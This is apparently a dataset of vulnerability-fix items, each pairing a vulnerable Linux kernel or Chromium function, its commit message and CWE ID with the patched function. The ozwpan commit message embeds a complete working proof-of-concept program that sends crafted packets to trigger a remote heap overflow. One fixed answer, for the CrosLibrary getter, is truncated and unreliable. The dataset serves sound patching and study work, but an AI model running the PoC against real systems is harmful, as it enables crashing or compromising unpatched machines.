Code: long vhost_dev_ioctl(struct vhost_dev *d, unsigned int ioctl, void __user *argp) { struct file *eventfp, *filep = NULL; struct eventfd_ctx *ctx = NULL; u64 p; long r; int i, fd; /* If you are not the owner, you can become one */ if (ioctl == VHOST_SET_OWNER) { r = vhost_dev_set_owner(d); goto done; } /* You must be the owner to do anything else */ r = vhost_dev_check_owner(d); if (r) goto done; switch (ioctl) { case VHOST_SET_MEM_TABLE: r = vhost_set_memory(d, argp); break; case VHOST_SET_LOG_BASE: if (copy_from_user(&p, argp, sizeof p)) { r = -EFAULT; break; } if ((u64)(unsigned long)p != p) { r = -EFAULT; break; } for (i = 0; i < d->nvqs; ++i) { struct vhost_virtqueue *vq; void __user *base = (void __user *)(unsigned long)p; vq = d->vqs[i]; mutex_lock(&vq->mutex); /* If ring is inactive, will check when it's enabled. */ if (vq->private_data && !vq_log_access_ok(vq, base)) r = -EFAULT; else vq->log_base = base; mutex_unlock(&vq->mutex); } break; case VHOST_SET_LOG_FD: r = get_user(fd, (int __user *)argp); if (r < 0) break; eventfp = fd == -1 ? NULL : eventfd_fget(fd); if (IS_ERR(eventfp)) { r = PTR_ERR(eventfp); break; } if (eventfp != d->log_file) { filep = d->log_file; ctx = d->log_ctx; d->log_ctx = eventfp ? eventfd_ctx_fileget(eventfp) : NULL; } else filep = eventfp; for (i = 0; i < d->nvqs; ++i) { mutex_lock(&d->vqs[i]->mutex); d->vqs[i]->log_ctx = d->log_ctx; mutex_unlock(&d->vqs[i]->mutex); } if (ctx) eventfd_ctx_put(ctx); if (filep) fput(filep); break; default: r = -ENOIOCTLCMD; break; } done: return r; } Commit Message: vhost: actually track log eventfd file While reviewing vhost log code, I found out that log_file is never set. Note: I haven't tested the change (QEMU doesn't use LOG_FD yet). Cc: stable@vger.kernel.org Signed-off-by: Marc-André Lureau <marcandre.lureau@redhat.com> Signed-off-by: Michael S. Tsirkin <mst@redhat.com> CWE ID: CWE-399
long vhost_dev_ioctl(struct vhost_dev *d, unsigned int ioctl, void __user *argp) { struct file *eventfp, *filep = NULL; struct eventfd_ctx *ctx = NULL; u64 p; long r; int i, fd; /* If you are not the owner, you can become one */ if (ioctl == VHOST_SET_OWNER) { r = vhost_dev_set_owner(d); goto done; } /* You must be the owner to do anything else */ r = vhost_dev_check_owner(d); if (r) goto done; switch (ioctl) { case VHOST_SET_MEM_TABLE: r = vhost_set_memory(d, argp); break; case VHOST_SET_LOG_BASE: if (copy_from_user(&p, argp, sizeof p)) { r = -EFAULT; break; } if ((u64)(unsigned long)p != p) { r = -EFAULT; break; } for (i = 0; i < d->nvqs; ++i) { struct vhost_virtqueue *vq; void __user *base = (void __user *)(unsigned long)p; vq = d->vqs[i]; mutex_lock(&vq->mutex); /* If ring is inactive, will check when it's enabled. */ if (vq->private_data && !vq_log_access_ok(vq, base)) r = -EFAULT; else vq->log_base = base; mutex_unlock(&vq->mutex); } break; case VHOST_SET_LOG_FD: r = get_user(fd, (int __user *)argp); if (r < 0) break; eventfp = fd == -1 ? NULL : eventfd_fget(fd); if (IS_ERR(eventfp)) { r = PTR_ERR(eventfp); break; } if (eventfp != d->log_file) { filep = d->log_file; d->log_file = eventfp; ctx = d->log_ctx; d->log_ctx = eventfp ? eventfd_ctx_fileget(eventfp) : NULL; } else filep = eventfp; for (i = 0; i < d->nvqs; ++i) { mutex_lock(&d->vqs[i]->mutex); d->vqs[i]->log_ctx = d->log_ctx; mutex_unlock(&d->vqs[i]->mutex); } if (ctx) eventfd_ctx_put(ctx); if (filep) fput(filep); break; default: r = -ENOIOCTLCMD; break; } done: return r; }
166,591
Analyze the following vulnerable code snippet, the commit message, and the CWE ID. Determine the impact category of this vulnerability. Output the fixed function only. Remember, I want response with just the fixed code only, No explanation.
Code: static ssize_t k90_show_current_profile(struct device *dev, struct device_attribute *attr, char *buf) { int ret; struct usb_interface *usbif = to_usb_interface(dev->parent); struct usb_device *usbdev = interface_to_usbdev(usbif); int current_profile; char data[8]; ret = usb_control_msg(usbdev, usb_rcvctrlpipe(usbdev, 0), K90_REQUEST_STATUS, USB_DIR_IN | USB_TYPE_VENDOR | USB_RECIP_DEVICE, 0, 0, data, 8, USB_CTRL_SET_TIMEOUT); if (ret < 0) { dev_warn(dev, "Failed to get K90 initial state (error %d).\n", ret); return -EIO; } current_profile = data[7]; if (current_profile < 1 || current_profile > 3) { dev_warn(dev, "Read invalid current profile: %02hhx.\n", data[7]); return -EIO; } return snprintf(buf, PAGE_SIZE, "%d\n", current_profile); } Commit Message: HID: corsair: fix DMA buffers on stack Not all platforms support DMA to the stack, and specifically since v4.9 this is no longer supported on x86 with VMAP_STACK either. Note that the macro-mode buffer was larger than necessary. Fixes: 6f78193ee9ea ("HID: corsair: Add Corsair Vengeance K90 driver") Cc: stable <stable@vger.kernel.org> Signed-off-by: Johan Hovold <johan@kernel.org> Signed-off-by: Jiri Kosina <jkosina@suse.cz> CWE ID: CWE-119
static ssize_t k90_show_current_profile(struct device *dev, struct device_attribute *attr, char *buf) { int ret; struct usb_interface *usbif = to_usb_interface(dev->parent); struct usb_device *usbdev = interface_to_usbdev(usbif); int current_profile; char *data; data = kmalloc(8, GFP_KERNEL); if (!data) return -ENOMEM; ret = usb_control_msg(usbdev, usb_rcvctrlpipe(usbdev, 0), K90_REQUEST_STATUS, USB_DIR_IN | USB_TYPE_VENDOR | USB_RECIP_DEVICE, 0, 0, data, 8, USB_CTRL_SET_TIMEOUT); if (ret < 0) { dev_warn(dev, "Failed to get K90 initial state (error %d).\n", ret); ret = -EIO; goto out; } current_profile = data[7]; if (current_profile < 1 || current_profile > 3) { dev_warn(dev, "Read invalid current profile: %02hhx.\n", data[7]); ret = -EIO; goto out; } ret = snprintf(buf, PAGE_SIZE, "%d\n", current_profile); out: kfree(data); return ret; }
168,394
Analyze the following vulnerable code snippet, the commit message, and the CWE ID. Determine the impact category of this vulnerability. Output the fixed function only. Remember, I want response with just the fixed code only, No explanation.
Code: void SecureProxyChecker::CheckIfSecureProxyIsAllowed( SecureProxyCheckerCallback fetcher_callback) { net::NetworkTrafficAnnotationTag traffic_annotation = net::DefineNetworkTrafficAnnotation( "data_reduction_proxy_secure_proxy_check", R"( semantics { sender: "Data Reduction Proxy" description: "Sends a request to the Data Reduction Proxy server. Proceeds " "with using a secure connection to the proxy only if the " "response is not blocked or modified by an intermediary." trigger: "A request can be sent whenever the browser is determining how " "to configure its connection to the data reduction proxy. This " "happens on startup and network changes." data: "A specific URL, not related to user data." destination: GOOGLE_OWNED_SERVICE } policy { cookies_allowed: NO setting: "Users can control Data Saver on Android via the 'Data Saver' " "setting. Data Saver is not available on iOS, and on desktop " "it is enabled by installing the Data Saver extension." policy_exception_justification: "Not implemented." })"); auto resource_request = std::make_unique<network::ResourceRequest>(); resource_request->url = params::GetSecureProxyCheckURL(); resource_request->load_flags = net::LOAD_DISABLE_CACHE | net::LOAD_BYPASS_PROXY; resource_request->allow_credentials = false; url_loader_ = network::SimpleURLLoader::Create(std::move(resource_request), traffic_annotation); static const int kMaxRetries = 5; url_loader_->SetRetryOptions( kMaxRetries, network::SimpleURLLoader::RETRY_ON_NETWORK_CHANGE | network::SimpleURLLoader::RETRY_ON_5XX); url_loader_->SetOnRedirectCallback(base::BindRepeating( &SecureProxyChecker::OnURLLoaderRedirect, base::Unretained(this))); fetcher_callback_ = fetcher_callback; secure_proxy_check_start_time_ = base::Time::Now(); url_loader_->DownloadToStringOfUnboundedSizeUntilCrashAndDie( url_loader_factory_.get(), base::BindOnce(&SecureProxyChecker::OnURLLoadComplete, base::Unretained(this))); } Commit Message: Disable all DRP URL fetches when holdback is enabled Disable secure proxy checker, warmup url fetcher and client config fetch when the client is in DRP (Data Reduction Proxy) holdback. This CL does not disable pingbacks when client is in the holdback, but the pingback code is going away soon. Change-Id: Icbb59d814d1452123869c609e0770d1439c1db51 Bug: 984964 Reviewed-on: https://chromium-review.googlesource.com/c/chromium/src/+/1709965 Commit-Queue: Tarun Bansal <tbansal@chromium.org> Reviewed-by: Robert Ogden <robertogden@chromium.org> Cr-Commit-Position: refs/heads/master@{#679649} CWE ID: CWE-416
void SecureProxyChecker::CheckIfSecureProxyIsAllowed( SecureProxyCheckerCallback fetcher_callback) { DCHECK(!params::IsIncludedInHoldbackFieldTrial()); net::NetworkTrafficAnnotationTag traffic_annotation = net::DefineNetworkTrafficAnnotation( "data_reduction_proxy_secure_proxy_check", R"( semantics { sender: "Data Reduction Proxy" description: "Sends a request to the Data Reduction Proxy server. Proceeds " "with using a secure connection to the proxy only if the " "response is not blocked or modified by an intermediary." trigger: "A request can be sent whenever the browser is determining how " "to configure its connection to the data reduction proxy. This " "happens on startup and network changes." data: "A specific URL, not related to user data." destination: GOOGLE_OWNED_SERVICE } policy { cookies_allowed: NO setting: "Users can control Data Saver on Android via the 'Data Saver' " "setting. Data Saver is not available on iOS, and on desktop " "it is enabled by installing the Data Saver extension." policy_exception_justification: "Not implemented." })"); auto resource_request = std::make_unique<network::ResourceRequest>(); resource_request->url = params::GetSecureProxyCheckURL(); resource_request->load_flags = net::LOAD_DISABLE_CACHE | net::LOAD_BYPASS_PROXY; resource_request->allow_credentials = false; url_loader_ = network::SimpleURLLoader::Create(std::move(resource_request), traffic_annotation); static const int kMaxRetries = 5; url_loader_->SetRetryOptions( kMaxRetries, network::SimpleURLLoader::RETRY_ON_NETWORK_CHANGE | network::SimpleURLLoader::RETRY_ON_5XX); url_loader_->SetOnRedirectCallback(base::BindRepeating( &SecureProxyChecker::OnURLLoaderRedirect, base::Unretained(this))); fetcher_callback_ = fetcher_callback; secure_proxy_check_start_time_ = base::Time::Now(); url_loader_->DownloadToStringOfUnboundedSizeUntilCrashAndDie( url_loader_factory_.get(), base::BindOnce(&SecureProxyChecker::OnURLLoadComplete, base::Unretained(this))); }
172,422
Analyze the following vulnerable code snippet, the commit message, and the CWE ID. Determine the impact category of this vulnerability. Output the fixed function only. Remember, I want response with just the fixed code only, No explanation.
Code: struct snd_seq_client_port *snd_seq_create_port(struct snd_seq_client *client, int port) { unsigned long flags; struct snd_seq_client_port *new_port, *p; int num = -1; /* sanity check */ if (snd_BUG_ON(!client)) return NULL; if (client->num_ports >= SNDRV_SEQ_MAX_PORTS) { pr_warn("ALSA: seq: too many ports for client %d\n", client->number); return NULL; } /* create a new port */ new_port = kzalloc(sizeof(*new_port), GFP_KERNEL); if (!new_port) return NULL; /* failure, out of memory */ /* init port data */ new_port->addr.client = client->number; new_port->addr.port = -1; new_port->owner = THIS_MODULE; sprintf(new_port->name, "port-%d", num); snd_use_lock_init(&new_port->use_lock); port_subs_info_init(&new_port->c_src); port_subs_info_init(&new_port->c_dest); num = port >= 0 ? port : 0; mutex_lock(&client->ports_mutex); write_lock_irqsave(&client->ports_lock, flags); list_for_each_entry(p, &client->ports_list_head, list) { if (p->addr.port > num) break; if (port < 0) /* auto-probe mode */ num = p->addr.port + 1; } /* insert the new port */ list_add_tail(&new_port->list, &p->list); client->num_ports++; new_port->addr.port = num; /* store the port number in the port */ write_unlock_irqrestore(&client->ports_lock, flags); mutex_unlock(&client->ports_mutex); sprintf(new_port->name, "port-%d", num); return new_port; } Commit Message: ALSA: seq: Fix use-after-free at creating a port There is a potential race window opened at creating and deleting a port via ioctl, as spotted by fuzzing. snd_seq_create_port() creates a port object and returns its pointer, but it doesn't take the refcount, thus it can be deleted immediately by another thread. Meanwhile, snd_seq_ioctl_create_port() still calls the function snd_seq_system_client_ev_port_start() with the created port object that is being deleted, and this triggers use-after-free like: BUG: KASAN: use-after-free in snd_seq_ioctl_create_port+0x504/0x630 [snd_seq] at addr ffff8801f2241cb1 ============================================================================= BUG kmalloc-512 (Tainted: G B ): kasan: bad access detected ----------------------------------------------------------------------------- INFO: Allocated in snd_seq_create_port+0x94/0x9b0 [snd_seq] age=1 cpu=3 pid=4511 ___slab_alloc+0x425/0x460 __slab_alloc+0x20/0x40 kmem_cache_alloc_trace+0x150/0x190 snd_seq_create_port+0x94/0x9b0 [snd_seq] snd_seq_ioctl_create_port+0xd1/0x630 [snd_seq] snd_seq_do_ioctl+0x11c/0x190 [snd_seq] snd_seq_ioctl+0x40/0x80 [snd_seq] do_vfs_ioctl+0x54b/0xda0 SyS_ioctl+0x79/0x90 entry_SYSCALL_64_fastpath+0x16/0x75 INFO: Freed in port_delete+0x136/0x1a0 [snd_seq] age=1 cpu=2 pid=4717 __slab_free+0x204/0x310 kfree+0x15f/0x180 port_delete+0x136/0x1a0 [snd_seq] snd_seq_delete_port+0x235/0x350 [snd_seq] snd_seq_ioctl_delete_port+0xc8/0x180 [snd_seq] snd_seq_do_ioctl+0x11c/0x190 [snd_seq] snd_seq_ioctl+0x40/0x80 [snd_seq] do_vfs_ioctl+0x54b/0xda0 SyS_ioctl+0x79/0x90 entry_SYSCALL_64_fastpath+0x16/0x75 Call Trace: [<ffffffff81b03781>] dump_stack+0x63/0x82 [<ffffffff81531b3b>] print_trailer+0xfb/0x160 [<ffffffff81536db4>] object_err+0x34/0x40 [<ffffffff815392d3>] kasan_report.part.2+0x223/0x520 [<ffffffffa07aadf4>] ? snd_seq_ioctl_create_port+0x504/0x630 [snd_seq] [<ffffffff815395fe>] __asan_report_load1_noabort+0x2e/0x30 [<ffffffffa07aadf4>] snd_seq_ioctl_create_port+0x504/0x630 [snd_seq] [<ffffffffa07aa8f0>] ? snd_seq_ioctl_delete_port+0x180/0x180 [snd_seq] [<ffffffff8136be50>] ? 
taskstats_exit+0xbc0/0xbc0 [<ffffffffa07abc5c>] snd_seq_do_ioctl+0x11c/0x190 [snd_seq] [<ffffffffa07abd10>] snd_seq_ioctl+0x40/0x80 [snd_seq] [<ffffffff8136d433>] ? acct_account_cputime+0x63/0x80 [<ffffffff815b515b>] do_vfs_ioctl+0x54b/0xda0 ..... We may fix this in a few different ways, and in this patch, it's fixed simply by taking the refcount properly at snd_seq_create_port() and letting the caller unref the object after use. Also, there is another potential use-after-free by sprintf() call in snd_seq_create_port(), and this is moved inside the lock. This fix covers CVE-2017-15265. Reported-and-tested-by: Michael23 Yu <ycqzsy@gmail.com> Suggested-by: Linus Torvalds <torvalds@linux-foundation.org> Cc: <stable@vger.kernel.org> Signed-off-by: Takashi Iwai <tiwai@suse.de> CWE ID: CWE-416
struct snd_seq_client_port *snd_seq_create_port(struct snd_seq_client *client, int port) { unsigned long flags; struct snd_seq_client_port *new_port, *p; int num = -1; /* sanity check */ if (snd_BUG_ON(!client)) return NULL; if (client->num_ports >= SNDRV_SEQ_MAX_PORTS) { pr_warn("ALSA: seq: too many ports for client %d\n", client->number); return NULL; } /* create a new port */ new_port = kzalloc(sizeof(*new_port), GFP_KERNEL); if (!new_port) return NULL; /* failure, out of memory */ /* init port data */ new_port->addr.client = client->number; new_port->addr.port = -1; new_port->owner = THIS_MODULE; sprintf(new_port->name, "port-%d", num); snd_use_lock_init(&new_port->use_lock); port_subs_info_init(&new_port->c_src); port_subs_info_init(&new_port->c_dest); snd_use_lock_use(&new_port->use_lock); num = port >= 0 ? port : 0; mutex_lock(&client->ports_mutex); write_lock_irqsave(&client->ports_lock, flags); list_for_each_entry(p, &client->ports_list_head, list) { if (p->addr.port > num) break; if (port < 0) /* auto-probe mode */ num = p->addr.port + 1; } /* insert the new port */ list_add_tail(&new_port->list, &p->list); client->num_ports++; new_port->addr.port = num; /* store the port number in the port */ sprintf(new_port->name, "port-%d", num); write_unlock_irqrestore(&client->ports_lock, flags); mutex_unlock(&client->ports_mutex); return new_port; }
167,729
Analyze the following vulnerable code snippet, the commit message, and the CWE ID. Determine the impact category of this vulnerability. Output the fixed function only. Remember, I want response with just the fixed code only, No explanation.
Code: void oz_usb_rx(struct oz_pd *pd, struct oz_elt *elt) { struct oz_usb_hdr *usb_hdr = (struct oz_usb_hdr *)(elt + 1); struct oz_usb_ctx *usb_ctx; spin_lock_bh(&pd->app_lock[OZ_APPID_USB]); usb_ctx = (struct oz_usb_ctx *)pd->app_ctx[OZ_APPID_USB]; if (usb_ctx) oz_usb_get(usb_ctx); spin_unlock_bh(&pd->app_lock[OZ_APPID_USB]); if (usb_ctx == NULL) return; /* Context has gone so nothing to do. */ if (usb_ctx->stopped) goto done; /* If sequence number is non-zero then check it is not a duplicate. * Zero sequence numbers are always accepted. */ if (usb_hdr->elt_seq_num != 0) { if (((usb_ctx->rx_seq_num - usb_hdr->elt_seq_num) & 0x80) == 0) /* Reject duplicate element. */ goto done; } usb_ctx->rx_seq_num = usb_hdr->elt_seq_num; switch (usb_hdr->type) { case OZ_GET_DESC_RSP: { struct oz_get_desc_rsp *body = (struct oz_get_desc_rsp *)usb_hdr; int data_len = elt->length - sizeof(struct oz_get_desc_rsp) + 1; u16 offs = le16_to_cpu(get_unaligned(&body->offset)); u16 total_size = le16_to_cpu(get_unaligned(&body->total_size)); oz_dbg(ON, "USB_REQ_GET_DESCRIPTOR - cnf\n"); oz_hcd_get_desc_cnf(usb_ctx->hport, body->req_id, body->rcode, body->data, data_len, offs, total_size); } break; case OZ_SET_CONFIG_RSP: { struct oz_set_config_rsp *body = (struct oz_set_config_rsp *)usb_hdr; oz_hcd_control_cnf(usb_ctx->hport, body->req_id, body->rcode, NULL, 0); } break; case OZ_SET_INTERFACE_RSP: { struct oz_set_interface_rsp *body = (struct oz_set_interface_rsp *)usb_hdr; oz_hcd_control_cnf(usb_ctx->hport, body->req_id, body->rcode, NULL, 0); } break; case OZ_VENDOR_CLASS_RSP: { struct oz_vendor_class_rsp *body = (struct oz_vendor_class_rsp *)usb_hdr; oz_hcd_control_cnf(usb_ctx->hport, body->req_id, body->rcode, body->data, elt->length- sizeof(struct oz_vendor_class_rsp)+1); } break; case OZ_USB_ENDPOINT_DATA: oz_usb_handle_ep_data(usb_ctx, usb_hdr, elt->length); break; } done: oz_usb_put(usb_ctx); } Commit Message: ozwpan: Use proper check to prevent heap overflow Since elt->length is a u8, we can make this variable a u8. Then we can do proper bounds checking more easily. Without this, a potentially negative value is passed to the memcpy inside oz_hcd_get_desc_cnf, resulting in a remotely exploitable heap overflow with network supplied data. This could result in remote code execution. A PoC which obtains DoS follows below. It requires the ozprotocol.h file from this module. 
=-=-=-=-=-= #include <arpa/inet.h> #include <linux/if_packet.h> #include <net/if.h> #include <netinet/ether.h> #include <stdio.h> #include <string.h> #include <stdlib.h> #include <endian.h> #include <sys/ioctl.h> #include <sys/socket.h> #define u8 uint8_t #define u16 uint16_t #define u32 uint32_t #define __packed __attribute__((__packed__)) #include "ozprotocol.h" static int hex2num(char c) { if (c >= '0' && c <= '9') return c - '0'; if (c >= 'a' && c <= 'f') return c - 'a' + 10; if (c >= 'A' && c <= 'F') return c - 'A' + 10; return -1; } static int hwaddr_aton(const char *txt, uint8_t *addr) { int i; for (i = 0; i < 6; i++) { int a, b; a = hex2num(*txt++); if (a < 0) return -1; b = hex2num(*txt++); if (b < 0) return -1; *addr++ = (a << 4) | b; if (i < 5 && *txt++ != ':') return -1; } return 0; } int main(int argc, char *argv[]) { if (argc < 3) { fprintf(stderr, "Usage: %s interface destination_mac\n", argv[0]); return 1; } uint8_t dest_mac[6]; if (hwaddr_aton(argv[2], dest_mac)) { fprintf(stderr, "Invalid mac address.\n"); return 1; } int sockfd = socket(AF_PACKET, SOCK_RAW, IPPROTO_RAW); if (sockfd < 0) { perror("socket"); return 1; } struct ifreq if_idx; int interface_index; strncpy(if_idx.ifr_ifrn.ifrn_name, argv[1], IFNAMSIZ - 1); if (ioctl(sockfd, SIOCGIFINDEX, &if_idx) < 0) { perror("SIOCGIFINDEX"); return 1; } interface_index = if_idx.ifr_ifindex; if (ioctl(sockfd, SIOCGIFHWADDR, &if_idx) < 0) { perror("SIOCGIFHWADDR"); return 1; } uint8_t *src_mac = (uint8_t *)&if_idx.ifr_hwaddr.sa_data; struct { struct ether_header ether_header; struct oz_hdr oz_hdr; struct oz_elt oz_elt; struct oz_elt_connect_req oz_elt_connect_req; } __packed connect_packet = { .ether_header = { .ether_type = htons(OZ_ETHERTYPE), .ether_shost = { src_mac[0], src_mac[1], src_mac[2], src_mac[3], src_mac[4], src_mac[5] }, .ether_dhost = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] } }, .oz_hdr = { .control = OZ_F_ACK_REQUESTED | (OZ_PROTOCOL_VERSION << OZ_VERSION_SHIFT), .last_pkt_num = 0, .pkt_num = htole32(0) }, .oz_elt = { .type = OZ_ELT_CONNECT_REQ, .length = sizeof(struct oz_elt_connect_req) }, .oz_elt_connect_req = { .mode = 0, .resv1 = {0}, .pd_info = 0, .session_id = 0, .presleep = 35, .ms_isoc_latency = 0, .host_vendor = 0, .keep_alive = 0, .apps = htole16((1 << OZ_APPID_USB) | 0x1), .max_len_div16 = 0, .ms_per_isoc = 0, .up_audio_buf = 0, .ms_per_elt = 0 } }; struct { struct ether_header ether_header; struct oz_hdr oz_hdr; struct oz_elt oz_elt; struct oz_get_desc_rsp oz_get_desc_rsp; } __packed pwn_packet = { .ether_header = { .ether_type = htons(OZ_ETHERTYPE), .ether_shost = { src_mac[0], src_mac[1], src_mac[2], src_mac[3], src_mac[4], src_mac[5] }, .ether_dhost = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] } }, .oz_hdr = { .control = OZ_F_ACK_REQUESTED | (OZ_PROTOCOL_VERSION << OZ_VERSION_SHIFT), .last_pkt_num = 0, .pkt_num = htole32(1) }, .oz_elt = { .type = OZ_ELT_APP_DATA, .length = sizeof(struct oz_get_desc_rsp) - 2 }, .oz_get_desc_rsp = { .app_id = OZ_APPID_USB, .elt_seq_num = 0, .type = OZ_GET_DESC_RSP, .req_id = 0, .offset = htole16(0), .total_size = htole16(0), .rcode = 0, .data = {0} } }; struct sockaddr_ll socket_address = { .sll_ifindex = interface_index, .sll_halen = ETH_ALEN, .sll_addr = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] } }; if (sendto(sockfd, &connect_packet, sizeof(connect_packet), 0, (struct sockaddr *)&socket_address, sizeof(socket_address)) < 0) { perror("sendto"); return 
1; } usleep(300000); if (sendto(sockfd, &pwn_packet, sizeof(pwn_packet), 0, (struct sockaddr *)&socket_address, sizeof(socket_address)) < 0) { perror("sendto"); return 1; } return 0; } Signed-off-by: Jason A. Donenfeld <Jason@zx2c4.com> Acked-by: Dan Carpenter <dan.carpenter@oracle.com> Cc: stable <stable@vger.kernel.org> Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org> CWE ID: CWE-119
void oz_usb_rx(struct oz_pd *pd, struct oz_elt *elt) { struct oz_usb_hdr *usb_hdr = (struct oz_usb_hdr *)(elt + 1); struct oz_usb_ctx *usb_ctx; spin_lock_bh(&pd->app_lock[OZ_APPID_USB]); usb_ctx = (struct oz_usb_ctx *)pd->app_ctx[OZ_APPID_USB]; if (usb_ctx) oz_usb_get(usb_ctx); spin_unlock_bh(&pd->app_lock[OZ_APPID_USB]); if (usb_ctx == NULL) return; /* Context has gone so nothing to do. */ if (usb_ctx->stopped) goto done; /* If sequence number is non-zero then check it is not a duplicate. * Zero sequence numbers are always accepted. */ if (usb_hdr->elt_seq_num != 0) { if (((usb_ctx->rx_seq_num - usb_hdr->elt_seq_num) & 0x80) == 0) /* Reject duplicate element. */ goto done; } usb_ctx->rx_seq_num = usb_hdr->elt_seq_num; switch (usb_hdr->type) { case OZ_GET_DESC_RSP: { struct oz_get_desc_rsp *body = (struct oz_get_desc_rsp *)usb_hdr; u16 offs, total_size; u8 data_len; if (elt->length < sizeof(struct oz_get_desc_rsp) - 1) break; data_len = elt->length - (sizeof(struct oz_get_desc_rsp) - 1); offs = le16_to_cpu(get_unaligned(&body->offset)); total_size = le16_to_cpu(get_unaligned(&body->total_size)); oz_dbg(ON, "USB_REQ_GET_DESCRIPTOR - cnf\n"); oz_hcd_get_desc_cnf(usb_ctx->hport, body->req_id, body->rcode, body->data, data_len, offs, total_size); } break; case OZ_SET_CONFIG_RSP: { struct oz_set_config_rsp *body = (struct oz_set_config_rsp *)usb_hdr; oz_hcd_control_cnf(usb_ctx->hport, body->req_id, body->rcode, NULL, 0); } break; case OZ_SET_INTERFACE_RSP: { struct oz_set_interface_rsp *body = (struct oz_set_interface_rsp *)usb_hdr; oz_hcd_control_cnf(usb_ctx->hport, body->req_id, body->rcode, NULL, 0); } break; case OZ_VENDOR_CLASS_RSP: { struct oz_vendor_class_rsp *body = (struct oz_vendor_class_rsp *)usb_hdr; oz_hcd_control_cnf(usb_ctx->hport, body->req_id, body->rcode, body->data, elt->length- sizeof(struct oz_vendor_class_rsp)+1); } break; case OZ_USB_ENDPOINT_DATA: oz_usb_handle_ep_data(usb_ctx, usb_hdr, elt->length); break; } done: oz_usb_put(usb_ctx); }
166,618
Analyze the following vulnerable code snippet, the commit message, and the CWE ID. Determine the impact category of this vulnerability. Output the fixed function only. Remember, I want response with just the fixed code only, No explanation.
Code: bool CanCapture(const Extension& extension, const GURL& url) { return extension.permissions_data()->CanCaptureVisiblePage( url, kTabId, nullptr /*error*/); } Commit Message: Call CanCaptureVisiblePage in page capture API. Currently the pageCapture permission allows access to arbitrary local files and chrome:// pages which can be a security concern. In order to address this, the page capture API needs to be changed similar to the captureVisibleTab API. The API will now only allow extensions to capture otherwise-restricted URLs if the user has granted activeTab. In addition, file:// URLs are only capturable with the "Allow on file URLs" option enabled. Bug: 893087 Change-Id: I6d6225a3efb70fc033e2e1c031c633869afac624 Reviewed-on: https://chromium-review.googlesource.com/c/1330689 Commit-Queue: Bettina Dea <bdea@chromium.org> Reviewed-by: Devlin <rdevlin.cronin@chromium.org> Reviewed-by: Varun Khaneja <vakh@chromium.org> Cr-Commit-Position: refs/heads/master@{#615248} CWE ID: CWE-20
bool CanCapture(const Extension& extension, const GURL& url, extensions::CaptureRequirement capture_requirement) { return extension.permissions_data()->CanCaptureVisiblePage( url, kTabId, nullptr /*error*/, capture_requirement); }
173,006
Analyze the following vulnerable code snippet, the commit message, and the CWE ID. Determine the impact category of this vulnerability. Output the fixed function only. Remember, I want response with just the fixed code only, No explanation.
Code: SyslogsLibrary* CrosLibrary::GetSyslogsLibrary() { return syslogs_lib_.GetDefaultImpl(use_stub_impl_); } Commit Message: chromeos: Replace copy-and-pasted code with macros. This replaces a bunch of duplicated-per-library cros function definitions and comments. BUG=none TEST=built it Review URL: http://codereview.chromium.org/6086007 git-svn-id: svn://svn.chromium.org/chrome/trunk/src@70070 0039d316-1c4b-4281-b951-d872f2087c98 CWE ID: CWE-189
SyslogsLibrary* CrosLibrary::GetSyslogsLibrary() {
170,631
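The fixed output for this record is cut short because, as the commit message says, the per-library getters were collapsed into a macro. A hedged C sketch of that deduplication idea — the macro, struct, and library names below are made up for illustration, not the Chromium macro:

struct SyslogsLibrary;   /* opaque per-feature libraries */
struct NetworkLibrary;

struct cros_library {
    struct SyslogsLibrary *syslogs;
    struct NetworkLibrary *network;
};

/* One macro stamps out every copy-pasted accessor body. */
#define DEFINE_GET_LIBRARY(name, field) \
    struct name *Get##name(struct cros_library *lib) { return lib->field; }

DEFINE_GET_LIBRARY(SyslogsLibrary, syslogs)
DEFINE_GET_LIBRARY(NetworkLibrary, network)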
Analyze the following vulnerable code snippet, the commit message, and the CWE ID. Determine the impact category of this vulnerability. Output the fixed function only. Remember, I want response with just the fixed code only, No explanation.
Code: void ResourceDispatcherHostImpl::OnSSLCertificateError( net::URLRequest* request, const net::SSLInfo& ssl_info, bool is_hsts_host) { DCHECK(request); ResourceRequestInfoImpl* info = ResourceRequestInfoImpl::ForRequest(request); DCHECK(info); GlobalRequestID request_id(info->GetChildID(), info->GetRequestID()); int render_process_id; int render_view_id; if(!info->GetAssociatedRenderView(&render_process_id, &render_view_id)) NOTREACHED(); SSLManager::OnSSLCertificateError(ssl_delegate_weak_factory_.GetWeakPtr(), request_id, info->GetResourceType(), request->url(), render_process_id, render_view_id, ssl_info, is_hsts_host); } Commit Message: Inherits SupportsWeakPtr<T> instead of having WeakPtrFactory<T> This change refines r137676. BUG=122654 TEST=browser_test Review URL: https://chromiumcodereview.appspot.com/10332233 git-svn-id: svn://svn.chromium.org/chrome/trunk/src@139771 0039d316-1c4b-4281-b951-d872f2087c98 CWE ID: CWE-119
void ResourceDispatcherHostImpl::OnSSLCertificateError( net::URLRequest* request, const net::SSLInfo& ssl_info, bool is_hsts_host) { DCHECK(request); ResourceRequestInfoImpl* info = ResourceRequestInfoImpl::ForRequest(request); DCHECK(info); GlobalRequestID request_id(info->GetChildID(), info->GetRequestID()); int render_process_id; int render_view_id; if(!info->GetAssociatedRenderView(&render_process_id, &render_view_id)) NOTREACHED(); SSLManager::OnSSLCertificateError( AsWeakPtr(), request_id, info->GetResourceType(), request->url(), render_process_id, render_view_id, ssl_info, is_hsts_host); }
170,989
Analyze the following vulnerable code snippet, the commit message, and the CWE ID. Determine the impact category of this vulnerability. Output the fixed function only. Remember, I want response with just the fixed code only, No explanation.
